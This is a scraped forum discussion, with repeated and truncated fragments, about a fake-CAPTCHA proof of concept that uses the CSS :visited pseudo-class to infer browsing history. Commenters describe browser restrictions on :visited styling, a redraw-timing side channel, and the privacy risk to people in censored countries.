It's interesting, but considering that a link URL must be a perfect match with one in your history in order to trigger the :visited pseudo-class, it doesn't strike me as a particularly dangerous...
It's interesting, but considering that a link URL must be a perfect match with one in your history in order to trigger the :visited pseudo-class, it doesn't strike me as a particularly dangerous leak. That's why this proof of concept can detect if you've been to, say, twitter.com, but not a specific user page or tweet.
OP mentioned that colors are the only properties of visited links that can be styled with CSS. For good reason, otherwise you could brute-force thousands of URLs onto the page and hide the ones that don't match, leaving the victim none the wiser.
So, browser developers are (rightfully) very concerned with this kind of privacy leak, and go a little bit farther than just restricting CSS styling - there is also no way for a server to access...
OP mentioned that colors are the only properties of visited links that can be styled with CSS.
So, browser developers are (rightfully) very concerned with this kind of privacy leak, and go a little bit farther than just restricting CSS styling - there is also no way for a server to access the :visited pseudo-class using JavaScript or anything else, IIRC. Any styling of :visited elements only appears to the end user. The reason why the "capcha" attack works is because you're actively clicking (visited) links, which then is an event that can be exfiltrated back to the server.
brute-force thousands of URLs onto the page
Also so, there is actually another attack that can bypass the need to click by kinda doing this. If you load an absolutely ridiculous number of urls (that the user hasn't visited - ie. something long and random) onto a page, and then change them all to a link you suspect the user has visited, the time the browser takes to redraw the page if the link color changes is actually measurable. This is a known issue and a WONTFIX (for performance reasons).
Consider this scenario though: A person in China is using the web. They have a VPN (or something similar, I'm not actually sure if a VPN is sufficient), and frequently use BBC, Facebook, and...
Consider this scenario though:
A person in China is using the web. They have a VPN (or something similar, I'm not actually sure if a VPN is sufficient), and frequently use BBC, Facebook, and YouTube to get around the Great Firewall. They go to a site, fill out this counterfeit CAPTCHA, and out to the government that they use banned sites.
The privacy issues around :visited are often more insidious than they appear.
Hmmm. That's a curious one! I agree there's some potential for abuse in such a scenario. I have questions about the real-world policies of China, regarding access of banned sites. Would simply...
Hmmm. That's a curious one! I agree there's some potential for abuse in such a scenario. I have questions about the real-world policies of China, regarding access of banned sites. Would simply having the URL in one's browser history be enough to justify an arrest? Seems like there's room for plausible deniability: if you attempt to load a URL but are unable to reach it (because it's blocked, doesn't exist, you're offline, etc.) it still gets saved in your history, even though you didn't retrieve any content from it. Maybe you unintentionally followed a rogue link or redirect. Maybe someone else had access to your computer. Would even the most totalitarian regime act on something so tenuous? I'm not sure.
I don't know specific answers to your questions, but simply transferring the knowledge that you have at least tried to access illicit material to a government that is oppressive is the problem....
I don't know specific answers to your questions, but simply transferring the knowledge that you have at least tried to access illicit material to a government that is oppressive is the problem. Whether they act on it and disappear the person who did it, or whether they simply put the person on a list to watch, it's all bad.
The real takeaway is that it took me about a half second to think of a way this plausibly infringes on someone's privacy. Someone who is looking to actively infringe on privacy can likely be a lot more effective at it.
A minor note about :visited is that it is actually quite a limited pseudo-element. The only usable CSS properties for :visited are: color background-color border-color, border-bottom-color,...
A minor note about :visited is that it is actually quite a limited pseudo-element. The only usable CSS properties for :visited are:
It's interesting, but considering that a link URL must be a perfect match with one in your history in order to trigger the
:visitedpseudo-class, it doesn't strike me as a particularly dangerous leak. That's why this proof of concept can detect if you've been to, say, twitter.com, but not a specific user page or tweet.OP mentioned that colors are the only properties of visited links that can be styled with CSS. For good reason, otherwise you could brute-force thousands of URLs onto the page and hide the ones that don't match, leaving the victim none the wiser.
So, browser developers are (rightfully) very concerned with this kind of privacy leak, and go a little bit farther than just restricting CSS styling - there is also no way for a server to access the
:visitedpseudo-class using JavaScript or anything else, IIRC. Any styling of:visitedelements only appears to the end user. The reason why the "capcha" attack works is because you're actively clicking (visited) links, which then is an event that can be exfiltrated back to the server.Also so, there is actually another attack that can bypass the need to click by kinda doing this. If you load an absolutely ridiculous number of urls (that the user hasn't visited - ie. something long and random) onto a page, and then change them all to a link you suspect the user has visited, the time the browser takes to redraw the page if the link color changes is actually measurable. This is a known issue and a WONTFIX (for performance reasons).
Consider this scenario though:
A person in China is using the web. They have a VPN (or something similar, I'm not actually sure if a VPN is sufficient), and frequently use BBC, Facebook, and YouTube to get around the Great Firewall. They go to a site, fill out this counterfeit CAPTCHA, and out to the government that they use banned sites.
The privacy issues around
:visitedare often more insidious than they appear.Hmmm. That's a curious one! I agree there's some potential for abuse in such a scenario. I have questions about the real-world policies of China, regarding access of banned sites. Would simply having the URL in one's browser history be enough to justify an arrest? Seems like there's room for plausible deniability: if you attempt to load a URL but are unable to reach it (because it's blocked, doesn't exist, you're offline, etc.) it still gets saved in your history, even though you didn't retrieve any content from it. Maybe you unintentionally followed a rogue link or redirect. Maybe someone else had access to your computer. Would even the most totalitarian regime act on something so tenuous? I'm not sure.
The answer is probably: "If they wanted a pretext for an action they were boing to take anyway." But at that point, the pretext barely matters.
I don't know specific answers to your questions, but simply transferring the knowledge that you have at least tried to access illicit material to a government that is oppressive is the problem. Whether they act on it and disappear the person who did it, or whether they simply put the person on a list to watch, it's all bad.
The real takeaway is that it took me about a half second to think of a way this plausibly infringes on someone's privacy. Someone who is looking to actively infringe on privacy can likely be a lot more effective at it.
There's also some history to
:visitedthat may be interesting.A minor note about
:visitedis that it is actually quite a limited pseudo-element. The only usable CSS properties for:visitedare:Notably, these are all colour related; you cannot extend this to images, due to the privacy restrictions on this pseudo element.
So don't do captchas that rely entirely on colour!